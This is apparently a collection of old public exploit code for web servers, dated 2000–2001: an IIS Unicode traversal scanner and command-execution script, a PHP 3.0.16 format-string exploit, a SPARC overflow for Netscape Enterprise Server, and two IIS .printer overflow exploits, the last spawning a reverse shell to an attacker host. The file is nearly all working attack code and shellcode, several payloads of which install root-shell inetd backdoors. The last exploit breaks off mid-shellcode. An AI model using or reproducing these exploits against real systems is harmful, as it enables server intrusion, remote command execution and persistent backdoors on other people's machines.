@scripts = ("..%c1%1c..", "..%c0%9v..", "..%c0%af..", "..%c0%qf..", "..%c1%8s..", "..%c1%9c..",
"..%c1%pc.."); # blah, i know i'm not l33t
# Open LOG Script
open(LOG, ">>log_unicode.log") || die "couldn't open a file for writing\n";
# Socket Stuff
foreach $script (@scripts) {
$submit = "GET /scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir HTTP/1.0 \n\r\n\r";
$ouch = "/scripts/$script/winnt/system32/cmd.exe?/c+dir+$dir";
foreach $site (@target) {
unless(fork()) {
chop($site) if $site =~ /\n$/; &connect($site);
} # so i lied
}
}
sub connect { # real socket stuff
my ($ste) = @_;
$iaddr = inet_aton($ste) || die "$ste might not be up, connecting to next site....\n";
$paddr = sockaddr_in($port, $iaddr);
$proto = getprotobyname('tcp');
local $SIG{ALRM} = sub { print "TimeOut On $ste, going to next one....\n" && exit(0) };
alarm $timeout;
socket(SCAN, PF_INET, SOCK_STREAM, $proto) || die("Error: couldn't make a socket to $ste");
connect(SCAN, $paddr) || die "Sorry couldn't connect to $ste, connecting to next site....\n";
send(SCAN, $submit, 0);
$blackout = <SCAN>;
($http,$code,$blah) == split(/ /, $blackout);
if ($code == "200") {
print "$ste has $ouch on there, go exploit it\n";
print LOG "$ste has $ouch on there\n";
}
else { print "$ste doesn't have it\n"; }
close(SCAN);
exit(0);
}
close(LOG);
# since we're done
exit;
# [2000-11-18]
80 MS Windows IIS Unicode Remote Transversal Bug (4)
#!/usr/bin/perl
#
# See http://www.securityfocus.com/vdb/bottom.html?section=exploit&vid=1806
#
# Very simple PERL script to execute commands on IIS Unicode vulnerable servers
# Use port number with SSLproxy for testing SSL sites
# Usage: unicodexecute2 IP:port command
# Only makes use of "Socket" library
#
# New in version2:
# Copy the cmd.exe to something else, and then use it.
# The script checks for this.
# Thnx to [email protected] for discovering the cmd.exe copy part
#
# Roelof Temmingh 2000/10/26
# [email protected] http://www.sensepost.com
use Socket;
# --------------init
if ($#ARGV<1) {die "Usage: unicodexecute IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);
# --------------test if cmd has been copied:
$failed=1;
$command="dir";
@results=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /sensepost.exe/) {$failed=0;}
}
$failed2=1;
if ($failed==1) {
print "Sensepost.exe not found - Copying CMD...\n";
$command="copy c:\\winnt\\system32\\cmd.exe sensepost.exe";
$command=~s/ /\%20/g;
@results2=sendraw("GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+$command HTTP/1.0\r\n\r\n");
foreach $line2 (@results2){
if (($line2 =~ /copied/ )) {$failed2=0;}
}
if ($failed2==1) {die "Copy of CMD failed - inspect manually:\n@results2\n\n"};
}
# ------------ we can assume that the cmd.exe is copied from here..
$command=@ARGV[1];
print "Sensepost.exe found - Executing [$command] on $host:$port\n";
$command=~s/ /\%20/g;
my @results=sendraw("GET /scripts/..%c0%af../inetpub/scripts/sensepost.exe?/c+$command HTTP/1.0\r\n\r\n");
print @results;
# ------------- Sendraw - thanx RFP [email protected]
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp') ||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }
}
# Spidermark: sensepostdata
# [2000-11-18]
80 PHP 3.0.16/4.0.2 Remote Format Overflow Exploit
/*
* PHP 3.0.16/4.0.2 remote format overflow exploit.
* Copyright (c) 2000
* Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau
* [email protected]
* my regards to sheib and darkx
* All rights reserved
* Pascal Boucheraine's paper was enlightening
* THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS CODE.
* YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS AND I CANNOT BE HELD RESPONSIBLE
* FOR THE CONSEQUENCES
* Usage:
* phpxpl -sx -uwww.victim.com/some.php3 | nc www.victim.com 80
*
* Slackware 7.0: eip address/shellcode address
* 0xbfff9b90/0xbfff958c
*
*/
/*
* We just printf the shellcode and stuff and nc it to the target
*/
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// this exploit does not like 0x0a = '\n' in the shellcode. also the NULL at
// the end of the shellcode will be removed as the shellcode is probably
// strcatted into the buffer. so do it again in the shellcode.
/*
* This shellcode is for Linux/x86.
* This shellcode spawns a shell and runs the command
* echo 'ingreslock stream tcp nowait root /bin/bash bash -i'>/tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf
*/
char shellcode[] = {
0xeb,0x41,
0x5e,
0x31,0xc0,
0x31,0xdb,
0xb0,0xa0,
0x89,0x34,0x06,
0x8d,0x4e,0x07,
0x88,0x19,
0x41,
0x41,
0xb0,0xa4,
0x89,0x0c,0x06,
0x8d,0x4e,0x0b,
0x88,0x19,
0x41,
0xb0,0xa8,
0x89,0x0c,0x06,
0x8d,0x4e,0x7f,
0x88,0x19,
0x31,0xd2,
0xb0,0xac,
0x89,0x14,0x06,
0x89,0xf3,
0x89,0xf1,
0xb0,0xa0,
0x01,0xc1,
0xb0,0x0b,
0xcd,0x80,
0x31,0xc0,
0xb0,0x01,
0x31,0xdb,
0xcd,0x80,
0xe8,0xba,0xff,0xff,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0xff,0xff, /* the string "/bin/sh" */
0x2d,0x63,0xff, /* the string "-c" */
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20, 0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20, 0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e, 0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f, 0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73, 0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f, 0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b, 0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69, 0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};
#define NOP 0x90
/*
* the PHP3 error buffer will already contain PHP 3 Warning: The Content-Type
* string was "multipart/form-data. This is 66 bytes long. we send 2 spaces
* for padding the addresses we embed in our attack buffer on word boundary
*/
#define PHP3_WARNING 68
#define BUF_LEN 1024
struct system_type {
char *name;
unsigned int nop;
char *shellcode;
int shellcode_len;
int offset; /* the number of pops we need to get to our own data*/
int already_written; /* number of bytes written by printf by the time we reach the our embedded data */
unsigned int eip_address; /* address where shellcode_address must be put */
unsigned int shellcode_address; /* address of shellcode in memory */
};
struct system_type systems[] = {
{
"Slackware Linux 7.0 - i386/Apache 1.3.12/PHP 3.0.16 (static module)",
0x90,
shellcode,
270, /* not exact but we got lots of space ;) */
27,
0x152,
0xbfff9c30,
0xbfff962c,
},
// somebody find these and fill it in please. should be
// straightforward.
{
"Red Hat 6.0 - i386/Apache 1.3.13/PHP 3.0.16 (static module)",
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
{
NULL,
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
};
void usage (void);
void parse_url (char *, char *);
void prepare_attack_buffer (char *, struct system_type *, char *);
int calculate_precision (unsigned int, int);
int
main (int argc, char *argv[])
{
char attack_buffer[2000]; // we construct the shellcode and stuff here
// the target is 1024 bytes long
struct system_type *sysptr;
char *url; // i hope these things dont get bigger than this
char target[2048]; // target will contain only the FQDN
unsigned int eip_address = 0, shellcode_address = 0;
int ctr = 0;
int nop_count;
char *walk;
int arg;
// at least expect a system type and url from the command line
if (argc < 3)
usage ();
// parse arguments
while ((arg = getopt (argc, argv, "s:u:e:h:")) != -1){
switch (arg){
case 'h':
sscanf (optarg, "%x", &shellcode_address);
break;
case 'e':
sscanf (optarg, "%x", &eip_address);
break;
case 's':
sysptr = &systems[atoi (optarg)];
break;
case 'u':
url = optarg;
parse_url (url, target);
break;
case '?':
default :
usage ();
}
}
if (eip_address)
sysptr->eip_address = eip_address;
if (shellcode_address)
sysptr->shellcode_address = shellcode_address;
prepare_attack_buffer (attack_buffer, sysptr, url);
// as of now write it out to stdout. later write it to a socket
write (STDOUT_FILENO, attack_buffer, sizeof (attack_buffer));
}
void
prepare_attack_buffer (char *attack_buffer, struct system_type *system,
char *url)
{
int dest_buffer_written; /* we keep track of how much bytes will be written in the destination buffer */
int ctr;
char *address;
char buf[25]; // temp buffer for %xd%n%xd%n%xd%n%xd%n
// where x is precision
int p1,p2,p3,p4;
int nop_count;
bzero (attack_buffer, 2000);
sprintf (attack_buffer, "POST http://%s HTTP/1.0\nConnection: close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data ", url);
// mark strlen here. whatever we write after here appears in the buffer
dest_buffer_written = strlen (attack_buffer);
strcat (attack_buffer, "\x11\x11\x11\x11");
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
/*
* we need to add %x corresponding to the number of pops we need to reach
* our embedded addresses we defined above
*/
for (; system->offset; system->offset--)
strcat (attack_buffer, "%x ");
p1 = calculate_precision ((system->shellcode_address & 0x000000ff), system->already_written);
p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8, system->already_written);
p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16, system->already_written);
p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24, system->already_written);
sprintf (buf, "%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4);
strcat (attack_buffer, buf);
ctr = strlen (attack_buffer);
dest_buffer_written = ctr - dest_buffer_written;
dest_buffer_written += PHP3_WARNING; // dest_buffer_written now contains the number of bytes the PHP_WARNING and then the 8 4 byte values and then the %x to pop off the stack
attack_buffer += ctr;
nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len;
memset (attack_buffer, NOP, nop_count);
/*
* Add our shellcode at last
*/
attack_buffer += nop_count;
strcat (attack_buffer, shellcode);
strcat (attack_buffer, "\n");
strcat (attack_buffer, "Content-Length: 1337\n\n");
}
void
usage (void)
{
int ctr;
fprintf (stderr, " Apache/PHP xploit\n");
fprintf (stderr, " Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau\n");
fprintf (stderr, " for the r00tcrew\n");
fprintf (stderr, " All rights reserved\n");
fprintf (stderr, "\nUsage:\n");
fprintf (stderr, "phpxpl -u url -s systype [ -e eip address ] [ -h shellcode address ]\n\n");
fprintf (stderr, "url: the complete url including FQDN and script on the server\n");
fprintf (stderr, " www.victim.com/info.php3\n");
fprintf (stderr, "available systypes:\n");
for (ctr = 0; systems[ctr].name; ctr++)
fprintf (stderr, "%d. %s\n", ctr, systems[ctr].name);
fprintf (stderr, "eip address: the address which the xploit overwrites with buffer address (specify thus 0xbfff9c30) \n");
fprintf (stderr, "shellcode address: the address which points to the NOPs (specify thus 0xbfff962c)\n");
fprintf (stderr, "\n");
exit (1);
}
void
parse_url (char *url, char *target)
{
char *ptr;
strcpy (target, url);
if (!(ptr = index (target, '/'))){
fprintf (stderr, "invalid url. specify the script name on the target server too\n");
exit (1);
}
*ptr = '\0';
}
/*
* addr_byte contains the byte we need to write out. for example: 2c in
* 0xbfff962c, then 96, ff and bf.
*/
int
calculate_precision (unsigned int addr_byte, int already_written_init)
{
static int already_written = 0;
int tmp;
if (!already_written)
already_written = already_written_init;
while (addr_byte < already_written)
addr_byte += 0x100;
tmp = addr_byte - already_written;
already_written = addr_byte;
return tmp;
}
// [2000-12-06]
80 Netscape Enterprise Server 4.0/sparc/SunOS 5.7 Remote Exploit
#!/usr/bin/perl
#
# Remote sploit for Netscape Enterprise Server 4.0/sparc/SunOS 5.7
# usage: ns-shtml.pl ['command line'] | nc victim port
#
# Sometimes server may hang or coredump.. eek ;-)
# [email protected]
$cmdline="echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/bob; /usr/sbin/inetd -s /tmp/bob";
$cmdline=$ARGV[0] if $ARGV[0];
$nop='%80%1b%c0%1f';
$strlen=0x54 + length($cmdline);
$cmdline=~ s/ /%20/g; # encode bad characters..
$strlen=sprintf "%%%x", $strlen;
$shell=
'%20%bf%ff%ff' .# start: bn,a <start-4> ! super-dooper trick to get current address ;')
'%20%bf%ff%ff' .# boom: bn,a <start>
'%7f%ff%ff%ff' .# call boom
'%90%03%e0%48' .# add %o7, binksh - boom, %o0 ! put binksh address into %o0
'%92%03%e0%38' .# add %o7, argz - boom, %o1 ! put address of argz array into %o1
'%a0%03%e0%51' .# add %o7, minusc - boom, %l0 ! put address of -c argument into %l0
'%a2%03%e0%54' .# add %o7, cmdline - boom, %l1 ! put address of command line argument into %l1
'%c0%2b%e0%50' .# stb %g0, [ %o7 + minusc-boom-1 ] ! put ending zero byte at the end of /bin/sh
'%c0%2b%e0%53' .# stb %g0, [ %o7 + cmdline-boom-1 ] ! put ending zero byte at the end of -c
'%c0%2b%e0' . $strlen .# stb %g0, [ %o7 + endmark-boom-1 ] ! put ending zero byte at the end of command line
'%d0%23%e0%38' .# st %o0, [ %o7 + argz-boom ] ! store pointer to ksh into 0 element of argz
'%e0%23%e0%3c' .# st %l0, [ %o7 + argz-boom+4 ] ! store pointer to -c into 1 element of argz
'%e2%23%e0%40' .# st %l1, [ %o7 + argz-boom+8 ] ! store pointer to cmdline into 2 element of argz
'%c0%23%e0%44' .# st %g0, [ %o7 + argz-boom+12 ] ! store NULL pointer at the end
'%82%10%20%0b' .# mov 0xb, %g1
'%91%d0%20%08' .# ta 8
'%ff%ff%ff%ff'. # 40 argz: 0xffffffff;
'%ff%ff%ff%ff'. # 44 0xffffffff;
'%ff%ff%ff%ff'. # 48 0xffffffff;
'%ff%ff%ff%ff'. # 52 0xffffffff;
'/bin/kshA' . # 56 binksh: "/bin/kshA";
'-cA' . $cmdline . 'A'; # cmdline: "blahblahA";
##################################################
# Generate huge GET /..<shellcode>...shtml here #
##################################################
$padd=814-length($shell);
print STDERR "pad is $padd\n";
print "GET /";
print $nop x 40;
print $she11;
print "A"x $padd;
print "\xfd\xe7%dc\x80"; # %i0
print "AAAA"; # %i1
print "AAAA"; # %i2
print "AAAA"; # %i3
print "AAAA"; # %i4
print "AAAA"; # %i5
print '%fd%c3%16%58'; #%fp (%i6)
print '%ff%21%d7%ac'; # %i7
print "A"x1200;
print ".shtml HTTP/1.0\n\n";
# [2001-01-27]
80 MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit
/************************************************** *********************
iishack 2000 - eEye Digital Security - 2001
This affects all unpatched windows 2000 machines with the .printer
isapi filter loaded. This is purely proof of concept.
Quick rundown of the exploit:
Eip overruns at position 260
i have 19 bytes of code to jump back to the beginning of the buffer.
(and a 4 byte eip jumping into a jmp esp located in mfc42.dll). The
jumpback was kinda weird, requiring a little forward padding to protect
the rest of the code.
The buffer itself:
Uou only have about 250ish bytes before the overflow(taking into
account the eip and jumpback), and like 211 after it. this makes
things tight. This is why i hardcoded the offsets and had 2 shellcodes,
one for each revision. normally, this would suck, but since iis is kind
to us, it cleanly restarts itself if we blow it, giving us another chance.
This should compile clean on windows, linux and *bsd. Other than that, you
are on your own, but the vector is a simple tcp vector, so no biggie.
The vector:
the overflow happens in the isapi handling the .printer extension. The actual
overflow is in the Host: header. This buffer is a bit weird, soi be carfull
what you pass into it. It has a minimal amount of parsing happening before
we get it, making some chars not able to be used(or forcing you to encode
your payload). As far as i can tell, the bad bytes i've come across are:
0x00(duh)
0x0a(this inits a return, basically flaking our buffer)
0x0d(same as above)
0x3a(colon: - this seems to be a separator of some kind, didn't have time or
energy to reverse it any further, it breaks stuff, keep it out of
your buffer)
i have a feeling that there are more bad chars, but in the shellcode i've written
(both this proof of concept and actual port binding shellcode), i've come across
problems, but haven't specifically tagged a "bad" char.
One more thing... inititally, i got this shellcode to fit on the left side of
the buffer overflow. something strange was causing it to fail if i had a length
of under about 315 chars. This seems strange to me, but it could be soemthing i
just screwed up writing this code. This explains the 0x03s padding the end of the
shellcode.
Ryan Permeh
[email protected]
greetz: riley, for finding the hole
marc, for being a cool boss
dale,nicula,firas, for being pimps
greg hoglund, for sparking some really interesting ideas on exploitable buffers
dark spyrit, for beginning the iis hack tradition
I would also like to thank the academy and to all of those who voted....
Barry, Levonne, and their $240.00 worth of pudding.
http://www.eeye.com/html/research/Advisories/tequila.jpg
************************************************** ***********************/
#ifdef _WIN32
#include <Winsock2.h>
#include <Windows.h>
#define snprintf _snprintf
#else
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#include <stdio.h>
void usage();
unsigned char GetXORValue(char *szBuff, unsigned long filesize);
unsigned char sc[2][315]={
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x 30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x 03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x 04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x 80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x 83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x 07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x 56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\xcb\xa5\xeb\x74\x8e\x28\xea\x74\x b8\xb3\xeb\x74\x27\x49"
"\xea\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x 66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x 68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x 66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x 6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x 74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x 90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\x e4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x00"
"\x8b\xc4\x83\xc0\x11\x33\xc9\x66\xb9\x20\x01\x80\x 30\x03\x40\xe2\xfa\xeb"
"\x03\x03\x03\x03\x5c\x88\xe8\x82\xef\x8f\x09\x03\x 03\x44\x80\x3c\xfc\x76"
"\xf9\x80\xc4\x07\x88\xf6\x30\xca\x83\xc2\x07\x88\x 04\x8a\x05\x80\xc5\x07"
"\x80\xc4\x07\xe1\xf7\x30\xc3\x8a\x3d\x80\xc5\x07\x 80\xc4\x17\x8a\x3d\x80"
"\xc5\x07\x30\xc3\x82\xc4\xfc\x03\x03\x03\x53\x6b\x 83\x03\x03\x03\x69\x01"
"\x53\x53\x6b\x03\x03\x03\x43\xfc\x76\x13\xfc\x56\x 07\x88\xdb\x30\xc3\x53"
"\x54\x69\x48\xfc\x76\x17\x50\xfc\x56\x0f\x50\xfc\x 56\x03\x53\xfc\x56\x0b"
"\xfc\xfc\xfc\xfc\x50\x33\xeb\x74\xf7\x86\xeb\x74\x 2e\xf0\xeb\x74\x4c\x30"
"\xeb\x74\x60\x39\x5f\x74\x74\x74\x2d\x66\x46\x7a\x 66\x2d\x60\x6c\x6e\x2d"
"\x77\x7b\x77\x03\x6a\x6a\x70\x6b\x62\x60\x68\x31\x 68\x23\x2e\x23\x66\x46"
"\x7a\x66\x23\x47\x6a\x64\x77\x6a\x62\x6f\x23\x50\x 66\x60\x76\x71\x6a\x77"
"\x7a\x0e\x09\x23\x45\x6c\x71\x23\x67\x66\x77\x62\x 6a\x6f\x70\x23\x75\x6a"
"\x70\x6a\x77\x39\x23\x4b\x77\x77\x73\x39\x2c\x2c\x 74\x74\x74\x2d\x66\x46"
"\x7a\x66\x2d\x60\x6c\x6e\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x90\x90\x90\x90\x 90\x90\x90\x90\xcb\x4a"
"\x42\x6c\x90\x90\x90\x90\x66\x81\xec\x14\x01\xff\x e4\x03\x03\x03\x03\x03"
"\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x03\x 03\x03\x03\x03\x03\x00"
};
main (int argc, char *argv[])
{
char request_message[500];
int X,sock,sp=0;
unsigned short serverport=htons(80);
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr attack;
#ifdef _WIN32
WORD werd;
WSADATA wsd;
werd= MAKEWORD(2,0);
WSAStartup(werd,&wsd);
#endif
printf("iishack2000 - Remote .printer overflow in 2k sp0 and sp1\n");
printf("Vulnerability found by Riley Hassell <[email protected]>\n");
printf("Exploit by Ryan Permeh <[email protected]>\n");
if(argc < 4) usage();
if(argv[1] != NULL)
{
nametocheck = gethostbyname (argv[1]);
memcpy(&attack.s_addr,nametocheck->h_addr_list[0],4);
}
else usage();
if(argv[2] != NULL)
{
serverport=ntohs((unsigned short)atoi(argv[2]));
}
if(argv[3] != NULL)
{
sp=atoi(argv[3]);
}
printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport));
memset(request_message,0x00,500);
snprintf(request_message,500,"GET /null.printer HTTP/1.1\r\nHost: %s\r\n\r\n",sc[sp]);
sock = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family=AF_INET;
serv_addr.sin_addr.s_addr = attack.s_addr;
serv_addr.sin_port = serverport;
X=connect (sock, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
if(X==0)
{
send(sock,request_message,strlen(request_message)* sizeof(char),0);
printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack));
printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0);
}
else
{
printf("Couldn't connect\n",inet_ntoa(attack));
}
#ifdef _WIN32
closesocket(sock);
#else
close(sock);
#endif
return 0;
}
void usage()
{
printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n");
printf("Example: iishack2000 127.0.0.1 80 0\n");
printf("Example: iishack2000 127.0.0.1 80 1\n");
exit(1);
}
// [2001-05-07]
80 MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2)
/* IIS 5 remote .printer overflow. "jill.c" (don't ask).
*
* by: dark spyrit <[email protected]>
*
* respect to eeye for finding this one - nice work.
* shouts to halvar, neofight and the beavuh bitchez.
*
* this exploit overwrites an exception frame to control eip and get to
* our code.. the code then locates the pointer to our larger buffer and
* execs.
*
* usage: jill <victim host> <victim port> <attacker host> <attacker port>
*
* the shellcode spawns a reverse cmd shell.. so you need to set up a
* netcat listener on the host you control.
*
* Ex: nc -l -p <attacker port> -vv
*
* I haven't slept in years.
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>
int main(int argc, char *argv[]){
/* the whole request rolled into one, pretty huh? carez. */
unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x 69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x 61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x 83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x 40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x 60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\x e6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x 78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x 9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x 56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x 96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\x e1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x 4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x 52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\x f1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\x c5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x 95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\x d2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x 18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x 95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x 85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\x c2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x 95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x 02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\x d2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\x c2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\x f5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x 95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x 05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x 05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x 8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\x ff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x 39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\x f0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\x d9\xfc\xf7\xe7\xf4\xe7"
